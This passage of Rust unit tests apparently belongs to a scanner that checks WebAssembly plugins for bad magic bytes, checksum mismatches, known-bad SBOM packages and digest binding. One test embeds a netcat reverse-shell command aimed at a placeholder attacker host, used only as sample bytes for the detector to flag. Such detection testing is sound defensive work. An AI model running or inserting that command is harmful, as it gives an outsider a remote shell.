    fn analyze_rejects_non_wasm_magic() {
        let junk = b"not-a-wasm-file";
        let outcome = analyze_bytes(junk, junk.len() as i64, &sha256_hex(junk));
        assert_eq!(outcome.status, "fail");
        assert_eq!(outcome.score, 0);
        assert!(any_title(&outcome, |t| t.contains("Not a valid WebAssembly module")));
    }

    #[test]
    fn analyze_flags_checksum_mismatch() {
        let outcome = analyze_bytes(EMPTY_WASM, EMPTY_WASM.len() as i64, "deadbeef");
        assert!(any_title(&outcome, |t| t == "Checksum mismatch"));
        assert!(outcome.score < 50);
    }

    #[test]
    fn analyze_flags_size_mismatch() {
        let outcome = analyze_bytes(EMPTY_WASM, 999_999, &sha256_hex(EMPTY_WASM));
        assert!(any_title(&outcome, |t| t == "Artifact size mismatch"));
    }

    #[test]
    fn analyze_detects_suspicious_byte_pattern() {
        // Trailing bytes after the header; the byte scan looks at raw content.
        let mut bytes = EMPTY_WASM.to_vec();
        bytes.extend_from_slice(b"nc -e /bin/sh attacker.example.com 4444");
        let checksum = sha256_hex(&bytes);
        let outcome = analyze_bytes(&bytes, bytes.len() as i64, &checksum);
        assert_eq!(outcome.status, "fail");
        assert!(any_title(&outcome, |t| {
            t.contains("reverse shell") || t.contains("Suspicious byte pattern")
        }));
    }

    #[test]
    fn analyze_flags_unexpected_wasm_version() {
        // Same magic, binary version 2.
        let bytes = b"\0asm\x02\x00\x00\x00";
        let checksum = sha256_hex(bytes);
        let outcome = analyze_bytes(bytes, bytes.len() as i64, &checksum);
        assert!(any_title(&outcome, |t| t == "Unexpected WASM binary version"));
    }

    // ----- seed-list SBOM checks -------------------------------------------

    #[test]
    fn sbom_flags_known_bad_via_purl() {
        let sbom = serde_json::json!({
            "components": [
                { "purl": "pkg:npm/event-stream@3.3.6" },
                { "purl": "pkg:npm/leftpad@1.0.0" },
            ]
        });
        let mut outcome = clean_outcome();
        apply_sbom_findings(&mut outcome, &sbom);
        // One critical hit: 100 - 40 = 60, which is in the warning band.
        assert_eq!(outcome.status, "warning");
        assert_eq!(outcome.score, 60);
        assert!(any_title(&outcome, |t| t.contains("event-stream")));
    }

    #[test]
    fn sbom_flags_version_prefix_match() {
        let sbom = serde_json::json!({
            "components": [
                { "purl": "pkg:cargo/openssl-src@111.0.5" },
                { "purl": "pkg:cargo/openssl-src@300.1.0" },
            ]
        });
        let mut outcome = clean_outcome();
        apply_sbom_findings(&mut outcome, &sbom);
        let hit_count = outcome
            .findings
            .as_array()
            .unwrap()
            .iter()
            .filter(|f| f["title"].as_str().unwrap().contains("openssl-src"))
            .count();
        assert_eq!(hit_count, 1, "only the 111.0.x row should match");
    }

    #[test]
    fn sbom_clean_manifest_passes() {
        let sbom = serde_json::json!({
            "components": [
                { "purl": "pkg:npm/leftpad@1.0.0" },
                { "purl": "pkg:cargo/serde@1.0.200" },
            ]
        });
        let mut outcome = clean_outcome();
        apply_sbom_findings(&mut outcome, &sbom);
        assert_eq!(outcome.status, "pass");
        assert_eq!(outcome.score, 100);
    }

    #[test]
    fn sbom_malformed_records_informational_finding() {
        let sbom = serde_json::json!({ "wrong_root": [] });
        let mut outcome = clean_outcome();
        apply_sbom_findings(&mut outcome, &sbom);
        // A missing components array is reported but not penalised.
        assert_eq!(outcome.status, "pass");
        assert_eq!(outcome.score, 100);
        assert!(any_title(&outcome, |t| t.contains("no 'components'")));
    }

    // ----- SBOM binding ----------------------------------------------------

    #[test]
    fn sbom_binding_bound_when_digest_matches() {
        let sbom = serde_json::json!({
            "metadata": {
                "component": {
                    "name": "my-plugin",
                    "hashes": [
                        { "alg": "SHA-256", "content": "DEADbeef" }
                    ]
                }
            }
        });
        let binding = verify_sbom_binding(&sbom, "deadbeef");
        assert!(matches!(binding, SbomBinding::Bound));
    }

    #[test]
    fn sbom_binding_unsigned_when_no_digest() {
        let sbom = serde_json::json!({
            "components": [
                { "purl": "pkg:npm/leftpad@1.0.0" }
            ]
        });
        let binding = verify_sbom_binding(&sbom, "deadbeef");
        assert!(matches!(binding, SbomBinding::Unsigned));
    }

    #[test]
    fn sbom_binding_mismatch_when_digest_disagrees() {
        let sbom = serde_json::json!({
            "metadata": {
                "component": {
                    "hashes": [
                        { "alg": "SHA-256", "content": "aaaa1111" }
                    ]
                }
            }
        });
        match verify_sbom_binding(&sbom, "bbbb2222") {
            SbomBinding::Mismatch { declared } => assert_eq!(declared, "aaaa1111"),
            other => panic!("expected Mismatch, got {:?}", other),
        }
    }

    #[test]
    fn sbom_binding_walks_component_hashes_too() {
        // The digest lives on a components[] row rather than metadata.component.
        let sbom = serde_json::json!({
            "components": [
                {
                    "name": "my-plugin",
                    "hashes": [
                        { "alg": "sha-256", "content": "CAFEBABE" }
                    ]
                }
            ]
        });
        let binding = verify_sbom_binding(&sbom, "cafebabe");
        assert!(matches!(binding, SbomBinding::Bound));
    }

    #[test]
    fn record_binding_mismatch_downgrades_outcome() {
        let mismatch = || SbomBinding::Mismatch {
            declared: "aaaa1111".to_string(),
        };

        // 100 - 60 = 40: exactly on the warning threshold.
        let mut outcome = clean_outcome();
        record_sbom_binding(&mut outcome, &mismatch());
        assert_eq!(outcome.score, 40);
        assert_eq!(outcome.status, "warning");

        // 60 - 60 = 0: drops all the way to fail.
        let mut warn_outcome = ScanOutcome {
            status: "warning".to_string(),
            score: 60,
            findings: JsonValue::Array(vec![]),
        };
        record_sbom_binding(&mut warn_outcome, &mismatch());
        assert_eq!(warn_outcome.score, 0);
        assert_eq!(warn_outcome.status, "fail");
    }

    #[test]
    fn record_binding_unsigned_keeps_pass_with_minor_penalty() {
        let mut outcome = clean_outcome();
        record_sbom_binding(&mut outcome, &SbomBinding::Unsigned);
        assert_eq!(outcome.status, "pass");
        assert_eq!(outcome.score, 95);
    }
}